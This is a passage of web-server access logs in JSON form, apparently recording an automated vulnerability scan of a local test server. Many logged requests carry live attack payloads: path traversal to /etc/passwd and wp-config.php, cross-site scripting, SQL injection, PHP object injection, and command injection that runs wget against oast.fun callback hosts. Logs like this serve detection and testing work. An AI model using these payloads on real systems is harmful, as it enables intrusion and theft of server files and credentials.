+0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /carbon/admin/login.jsp?loginStatus=false&errorCode=%27);alert(document.domain)// HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.050","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?action=dzsap_download&link=../../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /apache-default/phpmyadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.059","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /remote/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.055","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"_charset_=utf-8&j_username=aparker@geometrixx.info&j_password=aparker&j_validate=true","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.052","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"http://127.0.0.1/libs/granite/core/content/login.html", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /web-console/ServerInfo.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.218","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"action=test&configuration=O:10:\x22PMA_Config\x22:1:{s:6:\x22source\x22,s:11:\x22/etc/passwd\x22;}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /scripts/setup.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.221","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /upload/mobile/index.php?c=category&a=asynclist&price_max=1.0%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)'' HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.067","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /secure/ManageFilters.jspa?filter=popular&filterView=popular HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.058","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /objects/getImage.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=png HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.070","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /system/refinery/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ== HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.218","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /version HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.056","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /WAN_wan.htm?.gif HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.218","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"newUI=1&page=login&username=admin&langChange=0&ipaddr=192.168.1.66&login_page=login.shtml&homepage=main.shtml&sysinitpage=sysinit.shtml&hostname=wifi.wavlink.com&key=%27%3B%60wget+http%3A%2F%2Fc9v8h88smpv8c1ig07h0uc9wj8961tnm8.oast.fun%3B%60%3B%23&password=asd&lang_select=en","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/login.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.068","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.002","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/issuu-panel/menu/documento/requests/ajax-docs.php?abspath=%2Fetc%2Fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.055","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.052","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config/authentication_page.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.056","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /search.php?search=%22;wget+http%3A%2F%2Fc9v8h8gsmpv8c1qg07h0znzpzmnf1e45q.oast.fun%27;%22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.057","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /servlet/mstrWebAdmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.214","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?s=%22%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.060","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.061","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-includes/rss-functions.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.059","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /blog/phpmyadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.061","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /theme/default/img/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.000","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /community/?foro=signin&redirect_to=https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.223","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /objects/getImageMP4.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=jpg HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.059","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /v1.24/version HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.063","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dispatcher/invalidate.cache HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.062","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /install/page_start.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.057","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /WAN_wan.htm?.gif HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.067","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_horoscope&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.067","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.220","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /1.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.079","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/tsaupload.cgi?file_name=../../../../../..//etc/passwd&password= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.083","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/v1/AccountService/Accounts HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.229","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /servlet/mstrWebAdmin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.058","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /node_modules/mqtt/test/helpers/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.060","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /query?db=db&q=SHOW%20DATABASES HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.073","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login_up.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.068","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /forum/phpmyadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.070","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Dockerrun.aws.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.069","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /../../../../../../../../windows/win.ini HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.004","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.243","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /http://127.0.0.1example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.219","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /objects/getSpiritsFromVideo.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=jpg HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.073","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /command.cgi?cat%20/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.061","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /horde/util/barcode.php?type=../../../../../../../../../../../etc/./passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.062","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /backup.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.065","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.065","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /SolarWinds/InformationService/v3/Json/Query?query=SELECT+Uri+FROM+Orion.Pollers+ORDER+BY+PollerID+WITH+ROWS+1+TO+3+WITH+TOTALROWS HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.065","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/index/login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.063","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/dukapress/lib/dp_image.php?src=../../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.070","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.071","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.074","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.rar HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.210","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /php/phpmyadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.069","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/log.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.069","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/Attitude/go.php?https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.068","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /blog/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.059","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%E3%80%B1example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.057","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} 